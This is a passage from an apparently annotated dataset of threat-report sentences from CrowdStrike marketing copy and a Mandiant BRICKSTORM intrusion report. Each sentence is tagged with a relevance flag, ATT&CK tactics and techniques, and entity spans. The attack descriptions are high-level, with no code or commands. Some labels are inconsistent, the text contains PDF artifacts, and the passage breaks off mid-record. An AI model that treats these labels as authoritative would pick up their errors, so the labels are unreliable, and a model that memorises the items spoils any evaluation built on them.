"sentence_text": "Gain visibility across the most critical areas of enterprise risk Adversaries often use valid credentials to access cloud-facing victim environments and then3 use legitimate tools to execute their attack, making it difficult for defenders to differentiate between normal user activity and a breach.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Used valid credentials to access cloud accounts", "entities": [ { "text": "use valid credentials to access cloud-facing victim environments", "start": 84, "end": 148, "label": "Action" }, { "text": "use legitimate tools to execute their attack", "start": 159, "end": 203, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p54-s464-7fd260", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 54, "sentence_id": 464, "context_before": "Gain visibility across the most critical areas of enterprise risk Adversaries often use valid credentials to access cloud-facing victim environments and then3 use legitimate tools to execute their attack, making it difficult for defenders to differentiate between normal user activity and a breach.", "sentence_text": "By consolidating into a unified security platform with AI capabilities, organizations have complete visibility in one place and can easily control their operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s465-48a6a9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 465, "context_before": "By consolidating into a unified security platform with AI capabilities, organizations have complete visibility in one place and can easily control their operations.", "sentence_text": "Drive efficiency: Adversaries are getting faster — are you?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s466-593987", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 466, "context_before": "Drive efficiency: Adversaries are getting faster — are you?", "sentence_text": "It takes adversaries an average of 62 minutes — and the fastest only 2 minutes — to move laterally from an initially compromised host to another host within the environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s467-cb576c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 467, "context_before": "It takes adversaries an average of 62 minutes — and the fastest only 2 minutes — to move laterally from an initially compromised host to another host within the environment.", "sentence_text": "Can4 you keep up?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s468-e19e4f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 468, "context_before": "Can4 you keep up?", "sentence_text": "Let’s face it — legacy SIEM solutions have failed the SOC.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s469-645c0b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 469, "context_before": "Let’s face it — legacy SIEM solutions have failed the SOC.", "sentence_text": "You need a tool that’s faster, easier to deploy and more cost-effective than legacy SIEM solutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s470-4f9e37", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 470, "context_before": "You need a tool that’s faster, easier to deploy and more cost-effective than legacy SIEM solutions.", "sentence_text": "Investigate better approaches, such as CrowdStrike Falcon® Next-Gen SIEM, which unifies all threat detection, investigation and response in one cloud-delivered, AI-native platform for unrivaled efficiency and speed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s471-2df6e0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 471, "context_before": "Investigate better approaches, such as CrowdStrike Falcon® Next-Gen SIEM, which unifies all threat detection, investigation and response in one cloud-delivered, AI-native platform for unrivaled efficiency and speed.", "sentence_text": "Build a cybersecurity culture Though technology is clearly critical in the fight to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s472-bb882f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 472, "context_before": "Build a cybersecurity culture Though technology is clearly critical in the fight to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "sentence_text": "User awareness programs should be initiated to combat the continued threat of phishing and related social engineering5 techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s473-baebc7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 473, "context_before": "User awareness programs should be initiated to combat the continued threat of phishing and related social engineering5 techniques.", "sentence_text": "For security teams, practice makes perfect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p55-s474-3c972b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 55, "sentence_id": 474, "context_before": "For security teams, practice makes perfect.", "sentence_text": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p57-s475-70dced", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 57, "sentence_id": 475, "context_before": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "sentence_text": "Counter Adversary Operations FALCON ADVERSARY OVERWATCHTM | UNIFIED THREAT HUNTING Provides around-the-clock protection across endpoint, identity and cloud workloads delivered by AI-powered threat hunting experts, and includes built-in threat intelligence to expose adversary tradecraft, vulnerabilities and stolen credentials FALCON ADVERSARY INTELLIGENCE | SOC AUTOMATION Cuts response time from days to minutes across the entire security stack with end-to- end intelligence automation, and enables you to instantly submit potential threats to an automated sandbox, extract indicators of compromise and deploy countermeasures — all while continuously monitoring for fraud and safeguarding your brand, employees and sensitive data FALCON ADVERSARY HUNTER | INTEL-LED THREAT HUNTING Provides world-class intelligence reporting, technical analysis, and threat hunting and detection libraries, and cuts the time and cost required to understand and defend against sophisticated nation-state, eCrime and hacktivist adversaries FALCON COUNTER ADVERSARY OPERATIONS ELITE ON-DEMAND ANALYST Provides an assigned analyst who uses advanced investigative and threat hunting tools powered by deep adversary intelligence to identify and disrupt adversaries across your IT environment and beyond Cloud Security FALCON CLOUD SECURITY Provides breach protection, including threat intelligence, detection and response; workload runtime protection; and cloud security posture management across AWS, Azure and Google Cloud Platform (", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p58-s476-9761b2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 58, "sentence_id": 476, "context_before": "Counter Adversary Operations FALCON ADVERSARY OVERWATCHTM | UNIFIED THREAT HUNTING Provides around-the-clock protection across endpoint, identity and cloud workloads delivered by AI-powered threat hunting experts, and includes built-in threat intelligence to expose adversary tradecraft, vulnerabilities and stolen credentials FALCON ADVERSARY INTELLIGENCE | SOC AUTOMATION Cuts response time from days to minutes across the entire security stack with end-to- end intelligence automation, and enables you to instantly submit potential threats to an automated sandbox, extract indicators of compromise and deploy countermeasures — all while continuously monitoring for fraud and safeguarding your brand, employees and sensitive data FALCON ADVERSARY HUNTER | INTEL-LED THREAT HUNTING Provides world-class intelligence reporting, technical analysis, and threat hunting and detection libraries, and cuts the time and cost required to understand and defend against sophisticated nation-state, eCrime and hacktivist adversaries FALCON COUNTER ADVERSARY OPERATIONS ELITE ON-DEMAND ANALYST Provides an assigned analyst who uses advanced investigative and threat hunting tools powered by deep adversary intelligence to identify and disrupt adversaries across your IT environment and beyond Cloud Security FALCON CLOUD SECURITY Provides breach protection, including threat intelligence, detection and response; workload runtime protection; and cloud security posture management across AWS, Azure and Google Cloud Platform (", "sentence_text": "Enables hyper-accurate detection of identity-based threats in real time, leveraging AI and behavioral analytics to provide deep actionable insights to stop modern attacks like ransomware FALCON IDENTITY THREAT PROTECTION", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p59-s477-ee8e83", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 59, "sentence_id": 477, "context_before": "Enables hyper-accurate detection of identity-based threats in real time, leveraging AI and behavioral analytics to provide deep actionable insights to stop modern attacks like ransomware FALCON IDENTITY THREAT PROTECTION", "sentence_text": "FALCON EXPOSURE MANAGEMENT | EXPOSURE MANAGEMENT Allows security teams to prioritize exposures making the biggest impact and proactively reduce an adversary’s opportunity for compromise and lateral movement", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p59-s478-2198bd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 59, "sentence_id": 478, "context_before": "FALCON EXPOSURE MANAGEMENT | EXPOSURE MANAGEMENT Allows security teams to prioritize exposures making the biggest impact and proactively reduce an adversary’s opportunity for compromise and lateral movement", "sentence_text": "UNIFIED DATA PROTECTION Provides deep real-time visibility into what is happening with sensitive data and stops data theft with policy enforcement that automatically follows content, not files FALCON FILEVANTAGE | FILE INTEGRITY MONITORING Provides real-time, comprehensive and centralized visibility that boosts compliance and offers relevant contextual data FALCON FORENSICS | FORENSIC CYBERSECURITY Automates collection of point-in-time and historic forensic triage data for robust analysis of cybersecurity incidents FALCON FOR IT | AUTOMATED WORKFLOWS Extends the Falcon platform to automate IT and security workflows with an end-to-end, visibility-to-action life cycle Next-Gen SIEM FALCON NEXT-GEN SIEM | SIEM AND LOG MANAGEMENT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p59-s479-461489", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 59, "sentence_id": 479, "context_before": "UNIFIED DATA PROTECTION Provides deep real-time visibility into what is happening with sensitive data and stops data theft with policy enforcement that automatically follows content, not files FALCON FILEVANTAGE | FILE INTEGRITY MONITORING Provides real-time, comprehensive and centralized visibility that boosts compliance and offers relevant contextual data FALCON FORENSICS | FORENSIC CYBERSECURITY Automates collection of point-in-time and historic forensic triage data for robust analysis of cybersecurity incidents FALCON FOR IT | AUTOMATED WORKFLOWS Extends the Falcon platform to automate IT and security workflows with an end-to-end, visibility-to-action life cycle Next-Gen SIEM FALCON NEXT-GEN SIEM | SIEM AND LOG MANAGEMENT", "sentence_text": "Empowers you to swiftly shut down adversaries and slash SOC costs by unifying industry- leading detection, world-class intelligence, blazing-fast search and AI-led investigations in one cloud-delivered platform INCIDENT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p59-s480-a92070", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 59, "sentence_id": 480, "context_before": "Empowers you to swiftly shut down adversaries and slash SOC costs by unifying industry- leading detection, world-class intelligence, blazing-fast search and AI-led investigations in one cloud-delivered platform INCIDENT", "sentence_text": "RESPONSE Stop active breaches and restore order with the most informed and capable IR team available Incident Response Compromise Assessment Endpoint Recovery Network Detection Services Services Retainer", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p60-s481-2cd263", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 60, "sentence_id": 481, "context_before": "RESPONSE Stop active breaches and restore order with the most informed and capable IR team available Incident Response Compromise Assessment Endpoint Recovery Network Detection Services Services Retainer", "sentence_text": "STRATEGIC ADVISORY SERVICES Develop and mature the security program to improve defenses Tabletop Exercise Maturity Assessment Ransomware Defense Assessment SOC Assessment SEC Readiness Board and CXO Briefings RED TEAM SERVICES Stress-test and validate defenses through simulated attacks Penetration Testing Red Team/Blue Team Exercise Adversary Emulation Exercise CLOUD AND IDENTITY SERVICES Proactively secure the new perimeter Identity Security Assessment Cloud Security Assessment Red Team/Blue Team Exercise for Cloud Cloud Compromise Assessment TECHNICAL ADVISORY SERVICES Audit and address security gaps to tangibly reduce risk Technical Risk Assessment Cyber Threat Risk Evaluation TRAINING AND SECURITY UPSKILLING Become security experts under CrowdStrike tutelage", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p61-s482-689067", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 61, "sentence_id": 482, "context_before": "STRATEGIC ADVISORY SERVICES Develop and mature the security program to improve defenses Tabletop Exercise Maturity Assessment Ransomware Defense Assessment SOC Assessment SEC Readiness Board and CXO Briefings RED TEAM SERVICES Stress-test and validate defenses through simulated attacks Penetration Testing Red Team/Blue Team Exercise Adversary Emulation Exercise CLOUD AND IDENTITY SERVICES Proactively secure the new perimeter Identity Security Assessment Cloud Security Assessment Red Team/Blue Team Exercise for Cloud Cloud Compromise Assessment TECHNICAL ADVISORY SERVICES Audit and address security gaps to tangibly reduce risk Technical Risk Assessment Cyber Threat Risk Evaluation TRAINING AND SECURITY UPSKILLING Become security experts under CrowdStrike tutelage", "sentence_text": "About\nmodern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p61-s483-95dedb", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 61, "sentence_id": 483, "context_before": "About\nmodern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "sentence_text": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p61-s484-cb3bf4", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 61, "sentence_id": 484, "context_before": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "sentence_text": "| Facebook | Instagram Start a free trial today: www.crowdstrike.com/free-trial-guide logo, CrowdStrike Falcon and CrowdStrike Threat Graph are marks owned by CrowdStrike, Inc. and registered with the United States Patent and Trademark Office, and in other countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s1-5441b9", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "The value of these targets extends beyond typical espionage missions, potentially providing data to feed development of zero-days and establishing pivot points for broader access to downstream victims.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s2-ce0605", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "The value of these targets extends beyond typical espionage missions, potentially providing data to feed development of zero-days and establishing pivot points for broader access to downstream victims.", "sentence_text": "We attribute this activity to UNC5221 and closely related, suspected China-nexus threat clusters that employ sophisticated capabilities, including the exploitation of zero-day vulnerabilities targeting network appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s3-0ba80f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "We attribute this activity to UNC5221 and closely related, suspected China-nexus threat clusters that employ sophisticated capabilities, including the exploitation of zero-day vulnerabilities targeting network appliances.", "sentence_text": "While UNC5221 has been used synonymously with the actor publicly reported as Silk Typhoon, GTIG does not currently consider the two clusters to be the same.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s4-1a246e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "While UNC5221 has been used synonymously with the actor publicly reported as Silk Typhoon, GTIG does not currently consider the two clusters to be the same.", "sentence_text": "These intrusions are conducted with a particular focus on maintaining long-term stealthy access by deploying backdoors on appliances that do not support traditional endpoint detection and response (EDR) tools.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Adversaries deploy backdoors on appliances lacking EDR support to maintain long-term stealthy access.", "entities": [ { "text": "maintaining long-term stealthy access", "start": 58, "end": 95, "label": "Action" }, { "text": "deploying backdoors on appliances", "start": 99, "end": 132, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s5-1ffeb7", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "These intrusions are conducted with a particular focus on maintaining long-term stealthy access by deploying backdoors on appliances that do not support traditional endpoint detection and response (EDR) tools.", "sentence_text": "The actor employs methods for lateral movement and data theft that generate minimal to no security telemetry.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "The actor uses methods that enable lateral movement and data theft while minimizing security telemetry.", "entities": [ { "text": "The actor", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "employs methods for lateral movement", "start": 10, "end": 46, "label": "Action" }, { "text": "generate minimal to no security telemetry", "start": 67, "end": 108, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s6-cc5dd7", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "The actor employs methods for lateral movement and data theft that generate minimal to no security telemetry.", "sentence_text": "We are sharing an updated threat actor lifecycle for BRICKSTORM associated intrusions, along with specific and actionable steps organizations should take to hunt for and protect themselves from this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s7-3157ac", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "We are sharing an updated threat actor lifecycle for BRICKSTORM associated intrusions, along with specific and actionable steps organizations should take to hunt for and protect themselves from this activity.", "sentence_text": "Threat Actor Lifecycle", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s8-94f80f", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "Threat Actor Lifecycle", "sentence_text": "The actor behind BRICKSTORM employs sophisticated techniques to maintain persistence and minimize the visibility traditional security tools have into their activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s9-4e3701", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "The actor behind BRICKSTORM employs sophisticated techniques to maintain persistence and minimize the visibility traditional security tools have into their activities.", "sentence_text": "The section is a review of techniques observed from multiple Mandiant investigations, with customer details sanitized.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s10-b82d1d", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "The section is a review of techniques observed from multiple Mandiant investigations, with customer details sanitized.", "sentence_text": "Initial Access\nA consistent challenge across Mandiant investigations into BRICKSTORM intrusions has been determining the initial intrusion vector.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s11-cfa9cf", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "Initial Access\nA consistent challenge across Mandiant investigations into BRICKSTORM intrusions has been determining the initial intrusion vector.", "sentence_text": "In many cases, the average dwell time of 393 days exceeded log retention periods and the artifacts of the initial intrusion were no longer available.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s12-8774f0", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "In many cases, the average dwell time of 393 days exceeded log retention periods and the artifacts of the initial intrusion were no longer available.", "sentence_text": "Despite these challenges, a pattern in the available evidence points to the actor's focus on compromising perimeter and remote access infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s13-4e17bf", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "Despite these challenges, a pattern in the available evidence points to the actor's focus on compromising perimeter and remote access infrastructure.", "sentence_text": "In at least one case, the actor gained access by exploiting a zero-day vulnerability .", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "the actor gained access by exploiting a zero-day vulnerability", "entities": [ { "text": "gained access by exploiting a zero-day vulnerability", "start": 32, "end": 84, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s14-1355b6", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "In at least one case, the actor gained access by exploiting a zero-day vulnerability .", "sentence_text": "As noted in our previous blog post from April 2025, Mandiant has identified the use of post-exploitation scripts that have included a wide range of anti-forensics functions designed to obscure entry.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "use post-exploitation scripts with anti-forensics functions to obscure entry", "entities": [ { "text": "post-exploitation scripts", "start": 87, "end": 112, "label": "MalwareTool" }, { "text": "included a wide range of anti-forensics functions designed to obscure entry", "start": 123, "end": 198, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s15-f2173e", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "As noted in our previous blog post from April 2025, Mandiant has identified the use of post-exploitation scripts that have included a wide range of anti-forensics functions designed to obscure entry.", "sentence_text": "Establish Foothold\nThe primary backdoor used by this actor is BRICKSTORM, as previously discussed by Mandiant and others.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s16-762b96", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "Establish Foothold\nThe primary backdoor used by this actor is BRICKSTORM, as previously discussed by Mandiant and others.", "sentence_text": "BRICKSTORM includes SOCKS proxy functionality and is written in Go, which has wide cross-platform support.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s17-5c4d38", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "BRICKSTORM includes SOCKS proxy functionality and is written in Go, which has wide cross-platform support.", "sentence_text": "This is essential to support the actor’s preference to deploy backdoors on appliance platforms that do not support traditional EDR tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s18-555fc9", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "This is essential to support the actor’s preference to deploy backdoors on appliance platforms that do not support traditional EDR tools.", "sentence_text": "Although there is evidence of a BRICKSTORM variant for Windows , Mandiant has not observed it in any investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s19-5b2b32", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "Although there is evidence of a BRICKSTORM variant for Windows , Mandiant has not observed it in any investigation.", "sentence_text": "While BRICKSTORM has been found on many appliance types, UNC5221 consistently targets VMware vCenter and ESXi hosts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s20-8e4ec4", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "While BRICKSTORM has been found on many appliance types, UNC5221 consistently targets VMware vCenter and ESXi hosts.", "sentence_text": "In multiple cases, the threat actor deployed BRICKSTORM to a network appliance prior to pivoting to VMware systems.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": null, "procedure": "Deploy BRICKSTORM to a network appliance and pivot to VMware systems.", "entities": [ { "text": "threat actor", "start": 23, "end": 35, "label": "ThreatActor" }, { "text": "BRICKSTORM", "start": 45, "end": 55, "label": "MalwareTool" }, { "text": "deployed BRICKSTORM to a network appliance", "start": 36, "end": 78, "label": "Action" }, { "text": "pivoting to VMware systems", "start": 88, "end": 114, "label": "Action" }, { "text": "network appliance", "start": 61, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "VMware systems", "start": 100, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s21-c8d261", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "In multiple cases, the threat actor deployed BRICKSTORM to a network appliance prior to pivoting to VMware systems.", "sentence_text": "The actor moved laterally to a vCenter server in the environment using valid credentials, which were likely captured by the malware running on the network appliances.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "the actor moved laterally to a vCenter server using valid credentials", "entities": [ { "text": "moved laterally to a vCenter server in the environment using valid credentials", "start": 10, "end": 88, "label": "Action" }, { "text": "vCenter server", "start": 31, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "malware", "start": 124, "end": 131, "label": "MalwareTool" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s22-8d2bfe", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "The actor moved laterally to a vCenter server in the environment using valid credentials, which were likely captured by the malware running on the network appliances.", "sentence_text": "Our analysis of samples recovered from different victim organizations has found evidence of active development of BRICKSTORM.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s23-d5cfac", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "Our analysis of samples recovered from different victim organizations has found evidence of active development of BRICKSTORM.", "sentence_text": "While the core functionality has remained, some samples are obfuscated using Garble and some carry a new version of the custom wssoft library.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s24-3fd125", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "While the core functionality has remained, some samples are obfuscated using Garble and some carry a new version of the custom wssoft library.", "sentence_text": "Notably, this backdoor was deployed on an internal vCenter server after the victim organization had begun their incident response investigation, demonstrating that the threat actor was actively monitoring and capable of rapidly adapting their tactics to maintain persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "The threat actor deployed a backdoor on an internal vCenter server during incident response to maintain persistent access.", "entities": [ { "text": "the threat actor", "start": 164, "end": 180, "label": "ThreatActor" }, { "text": "was deployed on an internal vCenter server after the victim organization had begun their incident response investigation", "start": 23, "end": 143, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s25-d51fe6", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "Notably, this backdoor was deployed on an internal vCenter server after the victim organization had begun their incident response investigation, demonstrating that the threat actor was actively monitoring and capable of rapidly adapting their tactics to maintain persistence.", "sentence_text": "From the set of samples we’ve recovered, there has been no reuse of C2 domains across victims.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s26-6c3872", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "From the set of samples we’ve recovered, there has been no reuse of C2 domains across victims.", "sentence_text": "Escalate Privileges\nAt one investigation, Mandiant analyzed a vCenter server and found the threat actor installed a malicious Java Servlet filter for the Apache Tomcat server that runs the web interface for vCenter.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "The threat actor installed a malicious Java Servlet filter in the Apache Tomcat server on a vCenter system.", "entities": [ { "text": "the threat actor", "start": 87, "end": 103, "label": "ThreatActor" }, { "text": "installed a malicious Java Servlet filter for the Apache Tomcat server that runs the web interface for vCenter", "start": 104, "end": 214, "label": "Action" } ] }, { "uid": "mandiant-22_mandiant_report-p1-s27-c18294", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "Escalate Privileges\nAt one investigation, Mandiant analyzed a vCenter server and found the threat actor installed a malicious Java Servlet filter for the Apache Tomcat server that runs the web interface for vCenter.", "sentence_text": "A Servlet Filter is code that runs every time the web server receives an HTTP request.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s28-d4bbc7", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "A Servlet Filter is code that runs every time the web server receives an HTTP request.", "sentence_text": "Many organizations use Active Directory authentication for vCenter, which means BRICKSTEAL could capture those credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s29-3ed8ac", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, 